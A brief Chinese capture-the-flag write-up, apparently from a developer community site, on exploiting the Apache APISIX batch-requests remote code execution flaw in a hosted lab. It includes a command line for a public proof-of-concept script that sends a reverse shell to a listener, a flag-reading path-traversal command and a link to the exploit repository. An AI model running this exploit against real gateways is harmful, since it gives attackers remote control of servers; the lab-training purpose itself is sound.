声明:⽂中所涉及的技术、思路和⼯具仅供以安全为⽬的的学习交流使⽤,任何⼈不得将其⽤于⾮法⽤途以及盈利等⽬的,否则后果⾃⾏承担。所有渗透都需获取授权!

靶场介绍

Apache Apisix是美国阿帕奇(Apache)基金会的一个云原生的微服务API网关服务。该软件基于 OpenResty 和 etcd 来实现,具备动态路由和插件热加载,适合微服务体系下的 API 管理。 Apache APISIX中存在远程代码执行漏洞,该漏洞源于产品的batch-requests插件未对用户的批处理请求进行有效限制。攻击者可通过该漏洞绕过Admin API的IP限制,容易导致远程代码执行。

春秋云镜开启靶场:

http://eci-2ze4llupfqpdq7xjdiet.cloudeci1.ichunqiu.com:9080/

exp可以直接打

vps先开一个监听

 命令格式

python3 poc2.py -t eci-2zebn203x9kbbx7banv2.cloudeci1.ichunqiu.com -p 9080 -L 127.0.0.1 -P 9999

执行poc  vps成功收到shell

命令cat ../../../../../../flag  读取flag

POC地址
https://codeload.github.com/twseptian/cve-2022-24112/zip/refs/heads/main

Logo

权威|前沿|技术|干货|国内首个API全生命周期开发者社区

更多推荐